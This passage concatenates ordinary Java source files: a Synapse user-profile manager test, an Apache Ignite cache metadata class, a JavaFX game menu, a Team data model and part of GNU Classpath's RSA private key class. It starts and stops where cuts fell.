org.sagebionetworks.repo.model.entity.query.SortDirection; import org.sagebionetworks.repo.model.message.Settings; import org.sagebionetworks.repo.web.NotFoundException; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; import com.google.common.collect.Sets; @RunWith(SpringJUnit4ClassRunner.class) @ContextConfiguration(locations = { "classpath:test-context.xml" }) public class UserProfileManagerImplTest { @Autowired private UserManager userManager; @Autowired private UserProfileDAO userProfileDAO; @Autowired private UserProfileManager userProfileManager; @Autowired private EntityManager entityManager; @Autowired private EntityAclManager entityAclManager; private static final String USER_NAME = "foobar"; private static final String USER_EMAIL = "foo@bar.com"; private Long userId; private Long userIdTwo; UserInfo admin; UserInfo userInfo; UserInfo userInfoTwo; UserInfo anonymous; List<String> projectsToDelete; List<Long> usersToDelete; @Before public void setUp() throws Exception { admin = userManager.getUserInfo(AuthorizationConstants.BOOTSTRAP_PRINCIPAL.THE_ADMIN_USER.getPrincipalId()); anonymous = userManager.getUserInfo(AuthorizationConstants.BOOTSTRAP_PRINCIPAL.ANONYMOUS_USER.getPrincipalId()); usersToDelete = new LinkedList<>(); projectsToDelete = new LinkedList<>(); NewUser user = new NewUser(); user.setEmail(USER_EMAIL); user.setFirstName("Foo"); user.setLastName("Bar"); user.setUserName(USER_NAME); userId = userManager.createUser(user); userInfo = userManager.getUserInfo(userId); userInfo.setAcceptsTermsOfUse(true); usersToDelete.add(userId); user = new NewUser(); user.setEmail("doubleohhseven@gmail.com"); user.setFirstName("James"); user.setLastName("Bond"); user.setUserName("doubleohhseven"); userIdTwo = userManager.createUser(user); userInfoTwo = userManager.getUserInfo(userIdTwo); usersToDelete.add(userIdTwo); } @After public void tearDown() throws Exception { Collections.reverse(projectsToDelete); for (String entityId : projectsToDelete) { entityManager.deleteEntity(admin, entityId); } for (Long userId : usersToDelete) { userManager.deletePrincipal(admin, userId); } } @Test public void testCRU() throws DatastoreException, UnauthorizedException, NotFoundException { // delete the existing user profile so we can create our own userProfileDAO.delete(userId.toString()); // Create a new UserProfile Long principalId = Long.parseLong(this.userId.toString()); UserProfile created; { UserProfile profile = new UserProfile(); profile.setCompany("Spies 'R' Us"); profile.setFirstName("James"); profile.setLastName("Bond"); profile.setOwnerId(this.userId.toString()); profile.setUserName(USER_NAME); Settings settings = new Settings(); settings.setSendEmailNotifications(true); profile.setNotificationSettings(settings); // Create the profile created = this.userProfileManager.createUserProfile(profile); // the changed fields are etag and emails (which are ignored) // set these fields in 'profile' so we can compare to 'created' profile.setEmails(Collections.singletonList(USER_EMAIL)); profile.setOpenIds(new ArrayList<String>()); profile.setUserName(USER_NAME); profile.setEtag(created.getEtag()); profile.setCreatedOn(created.getCreatedOn()); assertEquals(profile, created); } assertNotNull(created); assertNotNull(created.getEtag()); UserInfo userInfo = new UserInfo(false, principalId); // Get it back UserProfile clone = userProfileManager.getUserProfile(principalId.toString()); assertEquals(created, clone); // Make sure we can update it created.setUserName("newUsername"); String startEtag = created.getEtag(); // Changing emails is currently disabled See UserProfile updated = userProfileManager.updateUserProfile(userInfo, created); assertFalse("Update failed to update the etag", startEtag.equals(updated.getEtag())); // Get it back clone = userProfileManager.getUserProfile(principalId.toString()); assertEquals(updated, clone); assertEquals("newUsername", clone.getUserName()); } // Note: In PLFM-2486 we allow the client to change the emails passed in, we // just ignore them @Test public void testPLFM_2504() throws DatastoreException, UnauthorizedException, NotFoundException { // delete the existing user profile so we can create our own userProfileDAO.delete(userId.toString()); // Create a new UserProfile Long principalId = Long.parseLong(this.userId.toString()); UserProfile profile = new UserProfile(); profile.setCompany("Spies 'R' Us"); profile.setEmails(new LinkedList<String>()); profile.getEmails().add("jamesBond@spies.org"); profile.setUserName("007"); profile.setOwnerId(this.userId.toString()); // Create the profile profile = this.userProfileManager.createUserProfile(profile); assertNotNull(profile); assertNotNull(profile.getUserName()); assertNotNull(profile.getEtag()); UserInfo userInfo = new UserInfo(false, principalId); // Get it back UserProfile clone = userProfileManager.getUserProfile(principalId.toString()); assertEquals(profile, clone); assertEquals(Collections.singletonList(USER_EMAIL), clone.getEmails()); // try to update it profile.getEmails().clear(); profile.getEmails().add("myNewEmail@spies.org"); String startEtag = profile.getEtag(); // update // OK to change emails, as any changes to email are ignored profile = userProfileManager.updateUserProfile(userInfo, profile); assertEquals(Collections.singletonList(USER_EMAIL), profile.getEmails()); } @Test(expected = NotFoundException.class) public void testGetPicturePresignedUrlNotFound() throws Exception { String userIdString = "" + userId; // get the presigned url for this handle assertNotNull(userProfileManager.getUserProfileImageUrl(userInfo, userIdString)); } @Test public void testPLFM_4554() throws Exception { // User one creates a project Project userOnesProject = createProject("userOneProject", userInfo); // Share the project with public grantReadAcess( AuthorizationConstants.BOOTSTRAP_PRINCIPAL.PUBLIC_GROUP.getPrincipalId(), userOnesProject.getId()); // Public projects should not appear on user two's list. List<ProjectHeader> headers = getProjects(userInfoTwo, userInfoTwo); assertNotNull(headers); assertTrue(headers.isEmpty()); // Grant user two read access to the project. grantReadAcess(userIdTwo, userOnesProject.getId()); // User two should now have one project. headers = getProjects(userInfoTwo, userInfoTwo); assertNotNull(headers); assertEquals(1, headers.size()); // call under test headers = getProjects(anonymous, userInfoTwo); assertNotNull(headers); assertEquals(1, headers.size()); /* * Anonymous should be able to see the public project explicitly shared with * user two. */ assertEquals(userOnesProject.getId(), headers.get(0).getId()); } /** * Get the projects for * * @param caller * @param lookingAt * @return */ private List<ProjectHeader> getProjects(UserInfo caller, UserInfo lookingAt) { Long teamId = null; ProjectListType type = ProjectListType.ALL; ProjectListSortColumn sortColumn = ProjectListSortColumn.PROJECT_NAME; SortDirection sortDirection = SortDirection.ASC; ProjectHeaderList paginated = userProfileManager.getProjects(caller, lookingAt, teamId, type, sortColumn, sortDirection, (new NextPageToken(null)).toToken()); if (paginated != null) { return paginated.getResults(); } return null; } /** * Helper to create a project. * * @param name * @param creator * @return */ private Project createProject(String name, UserInfo creator) { String activityId = null; Project project = new Project(); project.setName(name); String id = entityManager.createEntity(creator, project, activityId); projectsToDelete.add(id); return entityManager.getEntity(creator, id, Project.class); } /** * Helper to grant read access to an entity. * * @param toGrant * @param entityId * @throws Exception */ private void grantReadAcess(Long principalId, String entityId) throws Exception { AccessControlList acl = entityAclManager.getACL(entityId, admin); ResourceAccess ra = new ResourceAccess(); ra.setPrincipalId(principalId); ra.setAccessType(Sets.newHashSet(ACCESS_TYPE.READ)); acl.getResourceAccess().add(ra); entityAclManager.updateACL(acl, admin); } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.ignite.internal.visor.cache; import org.apache.ignite.cache.*; import org.apache.ignite.internal.util.tostring.*; import org.apache.ignite.internal.util.typedef.internal.*; import org.apache.ignite.lang.*; import java.io.*; import java.util.*; /** * Data transfer object for {@link CacheTypeMetadata}. */ public class VisorCacheTypeMetadata implements Serializable { /** */ private static final long serialVersionUID = 0L; /** Schema name in database. */ private String dbSchema; /** Table name in database. */ private String dbTbl; /** Key class used to store key in cache. */ private String keyType; /** Value class used to store value in cache. */ private String valType; /** Key fields. */ @GridToStringInclude private Collection<VisorCacheTypeFieldMetadata> keyFields; /** Value fields. */ @GridToStringInclude private Collection<VisorCacheTypeFieldMetadata> valFields; /** Fields to be queried, in addition to indexed fields. */ @GridToStringInclude private Map<String, String> qryFlds; /** Fields to index in ascending order. */ @GridToStringInclude private Map<String, String> ascFlds; /** Fields to index in descending order. */ @GridToStringInclude private Map<String, String> descFlds; /** Fields to index as text. */ @GridToStringInclude private Collection<String> txtFlds; /** Fields to create group indexes for. */ @GridToStringInclude private Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> grps; /** * @param types Cache types metadata configurations. * @return Data transfer object for cache type metadata configurations. */ public static Collection<VisorCacheTypeMetadata> list(Collection<CacheTypeMetadata> types) { if (types == null) return Collections.emptyList(); final Collection<VisorCacheTypeMetadata> cfgs = new ArrayList<>(types.size()); for (CacheTypeMetadata type : types) cfgs.add(from(type)); return cfgs; } /** * @param m Actual cache type metadata. * @return Data transfer object for given cache type metadata. */ public static VisorCacheTypeMetadata from(CacheTypeMetadata m) { assert m != null; VisorCacheTypeMetadata metadata = new VisorCacheTypeMetadata(); metadata.dbSchema(m.getDatabaseSchema()); metadata.dbTbl(m.getDatabaseTable()); metadata.keyType(m.getKeyType()); metadata.valType(m.getValueType()); ArrayList<VisorCacheTypeFieldMetadata> fields = new ArrayList<>(m.getKeyFields().size()); for (CacheTypeFieldMetadata field : m.getKeyFields()) fields.add(VisorCacheTypeFieldMetadata.from(field)); metadata.keyFields(fields); fields = new ArrayList<>(m.getValueFields().size()); for (CacheTypeFieldMetadata field : m.getValueFields()) fields.add(VisorCacheTypeFieldMetadata.from(field)); metadata.valFields(fields); metadata.qryFlds(convertFieldsMap(m.getQueryFields())); metadata.ascFlds(convertFieldsMap(m.getAscendingFields())); metadata.descFlds(convertFieldsMap(m.getDescendingFields())); metadata.txtFlds(m.getTextFields()); metadata.grps(convertGrpsMap(m.getGroups())); return metadata; } /** * Convert class object to string class name in the fields map. * * @param base Map with class object. * @return Map with string class name. */ private static Map<String, String> convertFieldsMap(Map<String, Class<?>> base) { Map<String, String> res = new LinkedHashMap<>(base.size()); for (Map.Entry<String, Class<?>> e : base.entrySet()) res.put(e.getKey(), U.compact(e.getValue().getName())); return res; } /** * Convert class object to string class name in the groups map. * * @param base Map with class object. * @return Map with string class name. */ private static Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> convertGrpsMap( Map<String, LinkedHashMap<String, IgniteBiTuple<Class<?>, Boolean>>> base) { Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> res = new LinkedHashMap<>(base.size()); for (Map.Entry<String, LinkedHashMap<String, IgniteBiTuple<Class<?>, Boolean>>> e : base.entrySet()) { LinkedHashMap<String, IgniteBiTuple<Class<?>, Boolean>> intBase = e.getValue(); LinkedHashMap<String, IgniteBiTuple<String, Boolean>> intRes = new LinkedHashMap<>(intBase.size()); for (Map.Entry<String, IgniteBiTuple<Class<?>, Boolean>> intE : intBase.entrySet()) { IgniteBiTuple<Class<?>, Boolean> val = intE.getValue(); intRes.put(intE.getKey(), new IgniteBiTuple<>(U.compact(val.get1().getName()), val.get2())); } res.put(e.getKey(), intRes); } return res; } /** * @param dbSchema New schema name in database. */ public void dbSchema(String dbSchema) { this.dbSchema = dbSchema; } /** * @return Schema name in database. */ public String dbSchema() { return dbSchema; } /** * @param dbTbl New table name in database. */ public void dbTbl(String dbTbl) { this.dbTbl = dbTbl; } /** * @return Table name in database. */ public String dbTbl() { return dbTbl; } /** * @param keyType New key class used to store key in cache. */ public void keyType(String keyType) { this.keyType = keyType; } /** * @return Key class used to store key in cache. */ public String keyType() { return keyType; } /** * @param valType New value class used to store value in cache. */ public void valType(String valType) { this.valType = valType; } /** * @return Value class used to store value in cache. */ public String valType() { return valType; } /** * @param keyFields New key fields. */ public void keyFields(Collection<VisorCacheTypeFieldMetadata> keyFields) { this.keyFields = keyFields; } /** * @return Key fields. */ public Collection<VisorCacheTypeFieldMetadata> keyFields() { return keyFields; } /** * @param valFields New value fields. */ public void valFields(Collection<VisorCacheTypeFieldMetadata> valFields) { this.valFields = valFields; } /** * @return Value fields. */ public Collection<VisorCacheTypeFieldMetadata> valFields() { return valFields; } /** * @param qryFlds New fields to be queried, in addition to indexed fields. */ public void qryFlds(Map<String, String> qryFlds) { this.qryFlds = qryFlds; } /** * @return Fields to be queried, in addition to indexed fields. */ public Map<String, String> qryFlds() { return qryFlds; } /** * @param ascFlds New fields to index in ascending order. */ public void ascFlds(Map<String, String> ascFlds) { this.ascFlds = ascFlds; } /** * @return Fields to index in ascending order. */ public Map<String, String> ascFlds() { return ascFlds; } /** * @param descFlds New fields to index in descending order. */ public void descFlds(Map<String, String> descFlds) { this.descFlds = descFlds; } /** * @return Fields to index in descending order. */ public Map<String, String> descFlds() { return descFlds; } /** * @param txtFlds New fields to index as text. */ public void txtFlds(Collection<String> txtFlds) { this.txtFlds = txtFlds; } /** * @return Fields to index as text. */ public Collection<String> txtFlds() { return txtFlds; } /** * @param grps New fields to create group indexes for. */ public void grps(Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> grps) { this.grps = grps; } /** * @return Fields to create group indexes for. */ public Map<String, LinkedHashMap<String, IgniteBiTuple<String, Boolean>>> grps() { return grps; } }
package com.ipfaffen.prishonor; import static com.ipfaffen.prishonor.Game.$; import javafx.animation.TranslateTransition; import javafx.beans.binding.Bindings; import javafx.event.Event; import javafx.event.EventHandler; import javafx.geometry.Insets; import javafx.geometry.Pos; import javafx.scene.Cursor; import javafx.scene.Node; import javafx.scene.image.ImageView; import javafx.scene.layout.BorderPane; import javafx.scene.layout.HBox; import javafx.scene.layout.Pane; import javafx.scene.layout.VBox; import javafx.scene.text.Font; import javafx.scene.text.FontWeight; import javafx.scene.text.Text; import javafx.util.Duration; import com.ipfaffen.prishonor.layout.ToolbarMenu; import com.ipfaffen.prishonor.type.Opacity; import com.ipfaffen.prishonor.util.WeakBinder; /** * @author Isaias Pfaffenseller */ public class GameMenu extends ToolbarMenu { private double divisorHeight; private double contentHeight; private Pane pane; private BorderPane content; private Pane divisor; private Pane progressBar; private ImageView pointsImage; private Text pointsText; private ImageView consumedTargetImage; private Text consumedTargetText; private ImageView consumedBonusTargetImage; private Text consumedBonusTargetText; private ImageView selectedSkillImage; private Text selectedSkillUsageLeftText; private Text selectedSkillLegendText; private ImageView prevStageImage; private ImageView nextStageImage; private ImageView restartImage; private TranslateTransition receivePointsAnimation; public GameMenu() { divisorHeight = 5; contentHeight = 32; } @Override public Pane pane() { if(pane == null) { pane = new VBox(); pane.setPrefHeight(getHeight()); pane.getChildren().add(divisor()); pane.getChildren().add(content()); } return pane; } /** * @return */ public BorderPane content() { if(content == null) { HBox leftPane = new HBox(10); leftPane.setAlignment(Pos.CENTER_LEFT); leftPane.getChildren().addAll(pointsImage(), pointsText()); leftPane.getChildren().addAll(consumedTargetImage(), consumedTargetText()); leftPane.getChildren().addAll(consumedBonusTargetImage(), consumedBonusTargetText()); if($.skill.hasSkill()) { leftPane.getChildren().addAll(selectedSkillImage(), selectedSkillUsageLeftText(), selectedSkillLegendText()); } HBox rightPane = new HBox(15); rightPane.getChildren().addAll(prevStageImage(), nextStageImage(), restartImage()); content = new BorderPane(); content.setPrefHeight(contentHeight); content.setPadding(new Insets(4, 8, 1, 8)); content.setStyle(String.format("-fx-background-color:%s;", R.color.base_background)); content.setLeft(leftPane); content.setRight(rightPane); } return content; } /** * @return */ public Pane divisor() { if(divisor == null) { divisor = new Pane(); divisor.setPrefHeight(divisorHeight); divisor.setStyle(String.format("-fx-background-color:%s;", R.color.target_empty_progres_bar)); divisor.getChildren().add(progressBar()); } return divisor; } /** * @return */ public Pane progressBar() { if(progressBar == null) { progressBar = new Pane(); progressBar.setPrefHeight(divisorHeight); progressBar.setStyle("-fx-background-color:black;"); } return progressBar; } /** * @param points */ public void arrangeOptions(int points) { double opacity = Opacity.FULLY_VISIBLE; consumedTargetImage().setOpacity(opacity); consumedTargetText().setOpacity(opacity); consumedBonusTargetImage().setOpacity(opacity); consumedBonusTargetText().setOpacity(opacity); opacity = Opacity.BARELY_VISIBLE; selectedSkillImage().setOpacity(opacity); selectedSkillUsageLeftText().setOpacity(opacity); selectedSkillLegendText().setOpacity(opacity); if(nextStageImage().isDisable() && !$.isLastStage() && points >= $.stage.getBronzeMedalPoints()) { enable(nextStageImage()); } } /** * @return */ public ImageView pointsImage() { if(pointsImage == null) { pointsImage = createImageView(R.image.points); pointsImage.setTranslateY(-1.5); pointsImage.setFitHeight(14); } return pointsImage; } /** * @return */ public Text pointsText() { if(pointsText == null) { pointsText = createText(); pointsText.setFont(Font.font(R.main.base_font, FontWeight.BOLD, 20)); WeakBinder.get().bind(pointsText.textProperty(), $.properties.pointsProperty().asString()); } return pointsText; } /** * @return */ public ImageView consumedTargetImage() { if(consumedTargetImage == null) { consumedTargetImage = createImageView(R.image.target); consumedTargetImage.setOpacity(Opacity.BARELY_VISIBLE); consumedTargetImage.setFitHeight(14); } return consumedTargetImage; } /** * @return */ public Text consumedTargetText() { if(consumedTargetText == null) { consumedTargetText = createText(); consumedTargetText.setOpacity(Opacity.BARELY_VISIBLE); WeakBinder.get().bind(consumedTargetText.textProperty(), $.properties.consumedTargetsProperty().asString()); } return consumedTargetText; } /** * @return */ public ImageView consumedBonusTargetImage() { if(consumedBonusTargetImage == null) { consumedBonusTargetImage = createImageView(R.image.target_bonus); consumedBonusTargetImage.setOpacity(Opacity.BARELY_VISIBLE); consumedBonusTargetImage.setFitHeight(14); } return consumedBonusTargetImage; } /** * @return */ public Text consumedBonusTargetText() { if(consumedBonusTargetText == null) { consumedBonusTargetText = createText(); consumedBonusTargetText.setOpacity(Opacity.BARELY_VISIBLE); WeakBinder.get().bind(consumedBonusTargetText.textProperty(), $.properties.consumedBonusTargetsProperty().asString()); } return consumedBonusTargetText; } /** * @return */ public ImageView selectedSkillImage() { if(selectedSkillImage == null) { selectedSkillImage = createImageView(R.image.points); selectedSkillImage.setFitHeight(20); selectedSkillImage.setTranslateX(30); WeakBinder.get().bind(selectedSkillImage.imageProperty(), $.skill.selectedImageProperty()); } return selectedSkillImage; } /** * @return */ public Text selectedSkillUsageLeftText() { if(selectedSkillUsageLeftText == null) { selectedSkillUsageLeftText = createText(); selectedSkillUsageLeftText.setTranslateX(30); WeakBinder.get().bind(selectedSkillUsageLeftText.textProperty(), Bindings.format("x%s", $.skill.selectedUsageLeftProperty().asString())); } return selectedSkillUsageLeftText; } /** * @return */ public Text selectedSkillLegendText() { if(selectedSkillLegendText == null) { selectedSkillLegendText = createText(); selectedSkillLegendText.setTranslateX(30); WeakBinder.get().bind(selectedSkillLegendText.textProperty(), $.skill.selectedLegendProperty()); } return selectedSkillLegendText; } /** * @return */ public ImageView prevStageImage() { if(prevStageImage == null) { prevStageImage = createImageView(R.image.prev, true); prevStageImage.setFitHeight(20); prevStageImage.setTranslateY(2); prevStageImage.setCursor(Cursor.HAND); prevStageImage.setPickOnBounds(true); prevStageImage.setOnMouseClicked(new EventHandler<Event>() { public void handle(Event event) { $.prevStage(); }; }); if($.isFirstStage()) { disable(prevStageImage); } } return prevStageImage; } /** * @return */ public ImageView nextStageImage() { if(nextStageImage == null) { nextStageImage = createImageView(R.image.next, true); nextStageImage.setFitHeight(20); nextStageImage.setTranslateY(2); nextStageImage.setCursor(Cursor.HAND); nextStageImage.setPickOnBounds(true); nextStageImage.setOnMouseClicked(new EventHandler<Event>() { public void handle(Event event) { $.nextStage(); }; }); if(!$.isAlreadyBeatStage()) { disable(nextStageImage); } } return nextStageImage; } /** * @return */ public ImageView restartImage() { if(restartImage == null) { restartImage = createImageView(R.image.restart, true); restartImage.setFitHeight(20); restartImage.setTranslateY(2); restartImage.setCursor(Cursor.HAND); restartImage.setPickOnBounds(true); restartImage.setOnMouseClicked(new EventHandler<Event>() { public void handle(Event event) { $.restart(); }; }); } return restartImage; } /** * @param node */ public void disable(Node node) { node.setDisable(true); node.setOpacity(Opacity.BARELY_VISIBLE); } /** * @param node */ public void enable(Node node) { node.setDisable(false); node.setOpacity(Opacity.FULLY_VISIBLE); } public void receivePoints() { receivePointsAnimation().playFromStart(); } /** * @return */ public TranslateTransition receivePointsAnimation() { if(receivePointsAnimation == null) { receivePointsAnimation = new TranslateTransition(Duration.millis(100), pointsText()); receivePointsAnimation.setCycleCount(2); receivePointsAnimation.setAutoReverse(true); receivePointsAnimation.setFromY(pointsText().getTranslateY()); receivePointsAnimation.setToY(2); } return receivePointsAnimation; } /** * @return */ public double getHeight() { return (contentHeight + divisorHeight); } }
package de.lukasniemeier.gamecenterlivesender.model.teams; import com.google.gson.annotations.Expose; public class Team { @Expose private String code; @Expose private String name; @Expose private String city; @Expose private String division; @Expose private String conference; @Expose private Integer teamID; @Expose private String logoURL; @Expose private String sponsors; @Expose private String ticketURL; @Expose private String compositeColor; @Expose private String venue; @Expose private String twitter; @Expose private String primaryColor; @Expose private String secondaryColor; @Expose private String liveAudio; @Expose private String audioIos; @Expose private String audioDroid; @Expose private String iosId; @Expose private String androidId; /** * @return The code */ public String getCode() { return code; } /** * @param code The code */ public void setCode(String code) { this.code = code; } /** * @return The name */ public String getName() { return name; } /** * @param name The name */ public void setName(String name) { this.name = name; } /** * @return The city */ public String getCity() { return city; } /** * @param city The city */ public void setCity(String city) { this.city = city; } /** * @return The division */ public String getDivision() { return division; } /** * @param division The division */ public void setDivision(String division) { this.division = division; } /** * @return The conference */ public String getConference() { return conference; } /** * @param conference The conference */ public void setConference(String conference) { this.conference = conference; } /** * @return The teamID */ public Integer getTeamID() { return teamID; } /** * @param teamID The teamID */ public void setTeamID(Integer teamID) { this.teamID = teamID; } /** * @return The logoURL */ public String getLogoURL() { return logoURL; } /** * @param logoURL The logoURL */ public void setLogoURL(String logoURL) { this.logoURL = logoURL; } /** * @return The sponsors */ public String getSponsors() { return sponsors; } /** * @param sponsors The sponsors */ public void setSponsors(String sponsors) { this.sponsors = sponsors; } /** * @return The ticketURL */ public String getTicketURL() { return ticketURL; } /** * @param ticketURL The ticketURL */ public void setTicketURL(String ticketURL) { this.ticketURL = ticketURL; } /** * @return The compositeColor */ public String getCompositeColor() { return compositeColor; } /** * @param compositeColor The compositeColor */ public void setCompositeColor(String compositeColor) { this.compositeColor = compositeColor; } /** * @return The venue */ public String getVenue() { return venue; } /** * @param venue The venue */ public void setVenue(String venue) { this.venue = venue; } /** * @return The twitter */ public String getTwitter() { return twitter; } /** * @param twitter The twitter */ public void setTwitter(String twitter) { this.twitter = twitter; } /** * @return The primaryColor */ public String getPrimaryColor() { return primaryColor; } /** * @param primaryColor The primaryColor */ public void setPrimaryColor(String primaryColor) { this.primaryColor = primaryColor; } /** * @return The secondaryColor */ public String getSecondaryColor() { return secondaryColor; } /** * @param secondaryColor The secondaryColor */ public void setSecondaryColor(String secondaryColor) { this.secondaryColor = secondaryColor; } /** * @return The liveAudio */ public String getLiveAudio() { return liveAudio; } /** * @param liveAudio The liveAudio */ public void setLiveAudio(String liveAudio) { this.liveAudio = liveAudio; } /** * @return The audioIos */ public String getAudioIos() { return audioIos; } /** * @param audioIos The audioIos */ public void setAudioIos(String audioIos) { this.audioIos = audioIos; } /** * @return The audioDroid */ public String getAudioDroid() { return audioDroid; } /** * @param audioDroid The audioDroid */ public void setAudioDroid(String audioDroid) { this.audioDroid = audioDroid; } /** * @return The iosId */ public String getIosId() { return iosId; } /** * @param iosId The iosId */ public void setIosId(String iosId) { this.iosId = iosId; } /** * @return The androidId */ public String getAndroidId() { return androidId; } /** * @param androidId The androidId */ public void setAndroidId(String androidId) { this.androidId = androidId; } }
/* GnuRSAPrivateKey.java -- Copyright 2001, 2002, 2003, 2006 Free Software Foundation, Inc. This file is a part of GNU Classpath. GNU Classpath is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. GNU Classpath is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GNU Classpath; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA Linking this library statically or dynamically with other modules is making a combined work based on this library. Thus, the terms and conditions of the GNU General Public License cover the whole combination. As a special exception, the copyright holders of this library give you permission to link this library with independent modules to produce an executable, regardless of the license terms of these independent modules, and to copy and distribute the resulting executable under terms of your choice, provided that you also meet, for each linked independent module, the terms and conditions of the license of that module. An independent module is a module which is not derived from or based on this library. If you modify this library, you may extend this exception to your version of the library, but you are not obligated to do so. If you do not wish to do so, delete this exception statement from your version. */ package gnu.java.security.key.rsa; import gnu.java.security.Configuration; import gnu.java.security.action.GetPropertyAction; import gnu.java.security.Registry; import gnu.java.security.key.IKeyPairCodec; import java.math.BigInteger; import java.security.AccessController; import java.security.PrivateKey; import java.security.interfaces.RSAPrivateCrtKey; import java.security.interfaces.RSAPrivateKey; /** * An object that embodies an RSA private key. * <p> * References: * <ol> * <li><a * href="http://www.cosic.esat.kuleuven.ac.be/nessie/workshop/submissions/rsa-pss.zip"> * RSA-PSS Signature Scheme with Appendix, part B.</a><br> * Primitive specification and supporting documentation.<br> * Jakob Jonsson and Burt Kaliski.</li> * </ol> */ public class GnuRSAPrivateKey extends GnuRSAKey implements PrivateKey, RSAPrivateCrtKey { /** The first prime divisor of the modulus. */ private final BigInteger p; /** The second prime divisor of the modulus. */ private final BigInteger q; /** The private exponent of an RSA private key. */ private final BigInteger d; /** The first factor's exponent. */ private final BigInteger dP; /** The second factor's exponent. */ private final BigInteger dQ; /** The CRT (Chinese Remainder Theorem) coefficient. */ private final BigInteger qInv; /** String representation of this key. Cached for speed. */ private transient String str; /** * Convenience constructor. Calls the constructor with 5 arguments passing * {@link Registry#RAW_ENCODING_ID} as the identifier of the preferred * encoding format. * * @param p the modulus first prime divisor. * @param q the modulus second prime divisor. * @param e the public exponent. * @param d the private exponent. */ public GnuRSAPrivateKey(BigInteger p, BigInteger q, BigInteger e, BigInteger d) { this(Registry.RAW_ENCODING_ID, p, q, e, d); } /** * Constructs a new instance of a <code>GnuRSAPrivateKey</code> given the * designated arguments. * * @param preferredFormat the indetifier of the preferred encoding format to * use when externalizing this key. * @param p the modulus first prime divisor. * @param q the modulus second prime divisor. * @param e the public exponent. * @param d the private exponent. */ public GnuRSAPrivateKey(int preferredFormat, BigInteger p, BigInteger q, BigInteger e, BigInteger d) { this(preferredFormat, p.multiply(q), e, d, p, q, e.modInverse(p.subtract(BigInteger.ONE)), e.modInverse(q.subtract(BigInteger.ONE)), q.modInverse(p)); } /** * Constructs a new instance of a <code>GnuRSAPrivateKey</code> given the * designated arguments. * * @param preferredFormat the indetifier of the preferred encoding format to * use when externalizing this key. * @param n the public modulus, which is also the product of <code>p</code> * and <code>q</code>. * @param e the public exponent. * @param d the private exponent. * @param p the modulus first prime divisor. * @param q the modulus second prime divisor. * @param dP the first prime's exponen. A positive integer less than * <code>p</code> and <code>q</code>, satisfying * <code>e * dP = 1 (mod p-1)</code>. * @param dQ the second prime's exponent. A positive integer less than * <code>p</code> and <code>q</code>, satisfying * <code>e * dQ = 1 (mod p-1)</code>. * @param qInv the Chinese Remainder Theorem coefiicient. A positive integer * less than <code>p</code>, satisfying * <code>q * qInv = 1 (mod p)</code>. */ public GnuRSAPrivateKey(int preferredFormat, BigInteger n, BigInteger e, BigInteger d, BigInteger p, BigInteger q, BigInteger dP, BigInteger dQ, BigInteger qInv) { super(preferredFormat == Registry.ASN1_ENCODING_ID ? Registry.PKCS8_ENCODING_ID : preferredFormat, n, e); this.d = d; this.p = p; this.q = q; // the exponents dP and dQ are positive integers less than p and q // respectively satisfying // e * dP = 1 (mod p-1); // e * dQ = 1 (mod q-1), this.dP = dP; this.dQ = dQ; // the CRT coefficient qInv is a positive integer less than p satisfying // q * qInv = 1 (mod p). this.qInv = qInv; } /** * A class method that takes the output of the <code>encodePrivateKey()</code> * method of an RSA keypair codec object (an instance implementing * {@link IKeyPairCodec} for RSA keys, and re-constructs an instance of this * object. * * @param k the contents of a previously encoded instance of this object. * @throws ArrayIndexOutOfBoundsException if there is not enough bytes, in * <code>k</code>, to represent a valid encoding of an instance * of this object. * @throws IllegalArgumentException if the byte sequence does not represent a * valid encoding of an instance of this object. */ public static GnuRSAPrivateKey valueOf(final byte[] k) { // try RAW codec if (k[0] == Registry.MAGIC_RAW_RSA_PRIVATE_KEY[0]) try { return (GnuRSAPrivateKey) new RSAKeyPairRawCodec().decodePrivateKey(k); } catch (IllegalArgumentException ignored) { } // try PKCS#8 codec return (GnuRSAPrivateKey) new RSAKeyPairPKCS8Codec().decodePrivateKey(k); } public BigInteger getPrimeP() { return p; } public BigInteger getPrimeQ() { return q; } public BigInteger getPrimeExponentP() { return dP; } public BigInteger getPrimeExponentQ() { return dQ; } public BigInteger getCrtCoefficient() { return qInv; } public BigInteger getPrivateExponent() { return d; } /** * Returns the encoded form of this private key according to the designated * format. * * @param format the desired format identifier of the resulting encoding. * @return the byte sequence encoding this key according to the designated * format. * @throws IllegalArgumentException if the format is not supported. * @see RSAKeyPairRawCodec * @see RSAKeyPairPKCS8Codec */ public byte[] getEncoded(int format) { final byte[] result; switch (format) { case IKeyPairCodec.RAW_FORMAT: result = new RSAKeyPairRawCodec().encodePrivateKey(this); break; case IKeyPairCodec.PKCS8_FORMAT: result = new RSAKeyPairPKCS8Codec().encodePrivateKey(this); break; default: throw new IllegalArgumentException("Unsupported encoding format: " + format); } return result; } /** * Returns <code>true</code> if the designated object is an instance of this * class and has the same RSA parameter values as this one. * * @param obj the other non-null RSA key to compare to. * @return <code>true</code> if the designated object is of the same type * and value as this one. */ public boolean equals(final Object obj) { if (obj == null) return false; if (obj instanceof RSAPrivateKey) { final RSAPrivateKey that = (RSAPrivateKey) obj; return super.equals(that) && d.equals(that.getPrivateExponent()); } if (obj instanceof RSAPrivateCrtKey) { final RSAPrivateCrtKey that = (RSAPrivateCrtKey) obj; return super.equals(that) && p.equals(that.getPrimeP()) && 